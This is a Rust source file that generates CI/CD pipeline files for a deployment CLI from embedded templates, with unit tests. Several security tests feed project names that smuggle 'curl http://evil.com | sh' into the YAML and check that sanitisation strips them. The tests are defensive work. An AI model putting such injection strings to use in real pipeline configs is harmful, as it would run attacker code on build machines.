//! CI/CD pipeline template generation.
//!
//! Uses `tera` (already in deps) to render platform-specific pipeline YAML from
//! the current `StackerConfig`.  Templates are embedded as string constants so
//! the binary requires no external template files.

use tera::{Context, Tera};

use crate::cli::config_parser::StackerConfig;
use crate::cli::error::CliError;

// ── Embedded templates ──────────────────────────────────────────────────────

/// GitHub Actions workflow template.
///
/// GitHub's own `${{ }}` expressions are wrapped in `{% raw %}…{% endraw %}`
/// so Tera does not attempt to evaluate them.
const GITHUB_ACTIONS_TEMPLATE: &str = r#"name: Deploy {{ name }} with Stacker

on:
  push:
    branches: [main]
  workflow_dispatch:

jobs:
  deploy:
    name: Deploy {{ name }}
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Install Stacker CLI
        run: curl -fsSL https://get.try.direct/stacker | sh

      - name: Deploy stack
        env:
          STACKER_TOKEN: {% raw %}${{ secrets.STACKER_TOKEN }}{% endraw %}
        run: stacker deploy --target {{ deploy_target }}
"#;

/// GitLab CI/CD pipeline template.
///
/// GitLab uses `$VARIABLE` syntax which does not conflict with Tera's `{{ }}`.
const GITLAB_CI_TEMPLATE: &str = r#"stages:
  - deploy

deploy:
  stage: deploy
  image: docker:latest
  services:
    - docker:dind
  variables:
    STACKER_TOKEN: $STACKER_TOKEN
  before_script:
    - curl -fsSL https://get.try.direct/stacker | sh
  script:
    - stacker deploy --target {{ deploy_target }}
  only:
    - main
"#;

/// Bitbucket Pipelines template.
const BITBUCKET_PIPELINES_TEMPLATE: &str = r#"# Bitbucket Pipelines generated by Stacker for {{ name }}
pipelines:
  branches:
    main:
      - step:
          name: Deploy {{ name }}
          image: atlassian/default-image:3
          script:
            - curl -fsSL https://get.try.direct/stacker | sh
            - export STACKER_TOKEN="$STACKER_TOKEN"
            - stacker deploy --target {{ deploy_target }}
"#;

/// Jenkins declarative pipeline template.
const JENKINSFILE_TEMPLATE: &str = r#"// Jenkins Pipeline generated by Stacker for {{ name }}
pipeline {
  agent any

  stages {
    stage('Deploy {{ name }}') {
      steps {
        sh 'curl -fsSL https://get.try.direct/stacker | sh'
        withEnv(['STACKER_TOKEN=' + env.STACKER_TOKEN]) {
          sh 'stacker deploy --target {{ deploy_target }}'
        }
      }
    }
  }
}
"#;

// ── CiExporter ──────────────────────────────────────────────────────────────

/// Renders CI/CD pipeline YAML for a given `StackerConfig`.
pub struct CiExporter {
    config: StackerConfig,
}

impl CiExporter {
    pub fn new(config: StackerConfig) -> Self {
        Self { config }
    }

    /// Render a GitHub Actions workflow YAML string.
    pub fn generate_github(&self) -> Result<String, CliError> {
        self.render(GITHUB_ACTIONS_TEMPLATE)
    }

    /// Render a GitLab CI/CD pipeline YAML string.
    pub fn generate_gitlab(&self) -> Result<String, CliError> {
        self.render(GITLAB_CI_TEMPLATE)
    }

    /// Render a Bitbucket Pipelines YAML string.
    pub fn generate_bitbucket(&self) -> Result<String, CliError> {
        self.render(BITBUCKET_PIPELINES_TEMPLATE)
    }

    /// Render a Jenkinsfile string.
    pub fn generate_jenkins(&self) -> Result<String, CliError> {
        self.render(JENKINSFILE_TEMPLATE)
    }

    fn render(&self, template_src: &str) -> Result<String, CliError> {
        let mut tera = Tera::default();
        tera.add_raw_template("ci", template_src)
            .map_err(|e| CliError::ConfigValidation(format!("CI template parse error: {e}")))?;

        // Sanitize name: only allow safe chars for YAML context
        let safe_name: String = self
            .config
            .name
            .chars()
            .filter(|c| c.is_alphanumeric() || matches!(c, ' ' | '_' | '-' | '.'))
            .collect();

        let mut ctx = Context::new();
        ctx.insert("name", &safe_name);
        ctx.insert("app_type", &self.config.app.app_type.to_string());
        ctx.insert("deploy_target", &self.config.deploy.target.to_string());

        if let Some(cloud) = &self.config.deploy.cloud {
            ctx.insert("cloud_provider", &cloud.provider.to_string());
            if let Some(region) = &cloud.region {
                ctx.insert("cloud_region", region);
            }
        }

        tera.render("ci", &ctx)
            .map_err(|e| CliError::ConfigValidation(format!("CI template render error: {e}")))
    }
}

// ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
// Security tests
// ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

#[cfg(test)]
mod tests {
    use super::*;
    use crate::cli::config_parser::StackerConfig;

    fn config_with_name(name: &str) -> StackerConfig {
        let mut config = StackerConfig::default();
        config.name = name.to_string();
        config
    }

    // ── SECURITY: YAML injection via project name ─────────────────
    // CWE-94: Improper Control of Generation of Code
    //
    // If a malicious stacker.yml sets `name` to a value containing YAML
    // special characters or newlines, the generated CI pipeline could be
    // manipulated to run arbitrary commands.

    #[test]
    fn test_github_yaml_injection_via_name_newline_is_sanitized() {
        let config = config_with_name("legit\n        run: curl http://evil.com | sh");
        let exporter = CiExporter::new(config);
        let result = exporter.generate_github().unwrap();

        assert!(
            !result.contains("curl http://evil.com"),
            "Injected content must be stripped from output. Got:\n{}",
            result
        );
        // The sanitized name should still contain the safe part
        assert!(result.contains("legit"));
    }

    #[test]
    fn test_gitlab_template_uses_only_enum_deploy_target() {
        // GitLab template only uses {{ deploy_target }} which comes from
        // a Rust enum (DeployTarget) — so injection is not possible through
        // the name field. This test verifies the template is safe.
        let config = config_with_name("legit\n    - curl http://evil.com | sh");
        let exporter = CiExporter::new(config);
        let result = exporter.generate_gitlab().unwrap();

        // The name is NOT used in the gitlab template, so it cannot be injected
        assert!(!result.contains("evil.com"));
        assert!(result.contains("--target"));
    }

    #[test]
    fn test_github_yaml_injection_via_deploy_target() {
        // deploy_target is derived from an enum so it's constrained,
        // but we verify the template still renders safely with normal values
        let config = config_with_name("safe-project");
        let exporter = CiExporter::new(config);
        let result = exporter.generate_github().unwrap();
        assert!(result.contains("--target local"));
        assert!(result.contains("Deploy safe-project"));
    }

    #[test]
    fn test_normal_project_name_renders_correctly() {
        let config = config_with_name("my-app");
        let exporter = CiExporter::new(config);

        let github = exporter.generate_github().unwrap();
        assert!(github.contains("name: Deploy my-app with Stacker"));
        assert!(github.contains("--target local"));

        let gitlab = exporter.generate_gitlab().unwrap();
        assert!(gitlab.contains("--target local"));
    }

    #[test]
    fn test_render_uses_resolved_named_target() {
        let config = StackerConfig::from_str(
            r#"
name: my-app
app:
  type: static
deploy:
  default_target: prod
  targets:
    local:
      compose_file: docker/local/compose.yml
    prod:
      cloud:
        provider: aws
"#,
        )
        .unwrap()
        .with_resolved_deploy_target(None)
        .unwrap();

        let exporter = CiExporter::new(config);
        let github = exporter.generate_github().unwrap();
        assert!(github.contains("--target cloud"));
    }

    #[test]
    fn test_bitbucket_yaml_injection_via_name_newline_is_sanitized() {
        let config = config_with_name("legit\n          script: curl http://evil.com | sh");
        let exporter = CiExporter::new(config);
        let result = exporter.generate_bitbucket().unwrap();

        assert!(
            !result.contains("script: curl"),
            "Injected content must be stripped from output. Got:\n{}",
            result
        );
        assert!(!result.contains("curl http://evil.com"));
        assert!(result.contains("Bitbucket Pipelines generated by Stacker for legit"));
    }

    #[test]
    fn test_bitbucket_template_renders_expected_output() {
        let config = config_with_name("my-app");
        let exporter = CiExporter::new(config);
        let result = exporter.generate_bitbucket().unwrap();

        assert!(result.contains("Bitbucket Pipelines generated by Stacker"));
        assert!(result.contains("Deploy my-app"));
        assert!(result.contains("stacker deploy --target local"));
        assert!(result.contains("branches:"));
        assert!(result.contains("main:"));
    }

    #[test]
    fn test_bitbucket_template_references_stacker_token() {
        let config = config_with_name("token-app");
        let exporter = CiExporter::new(config);
        let result = exporter.generate_bitbucket().unwrap();

        assert!(result.contains("STACKER_TOKEN"));
        assert!(result.contains("export STACKER_TOKEN=\"$STACKER_TOKEN\""));
    }

    #[test]
    fn test_jenkins_template_renders_expected_output() {
        let config = config_with_name("jenkins-app");
        let exporter = CiExporter::new(config);
        let result = exporter.generate_jenkins().unwrap();

        assert!(result.contains("Jenkins Pipeline generated by Stacker"));
        assert!(result.contains("stage('Deploy jenkins-app')"));
        assert!(result.contains("stacker deploy --target local"));
    }

    #[test]
    fn test_jenkins_template_references_stacker_token() {
        let config = config_with_name("jenkins-token-app");
        let exporter = CiExporter::new(config);
        let result = exporter.generate_jenkins().unwrap();

        assert!(result.contains("STACKER_TOKEN"));
        assert!(result.contains("env.STACKER_TOKEN"));
    }
}
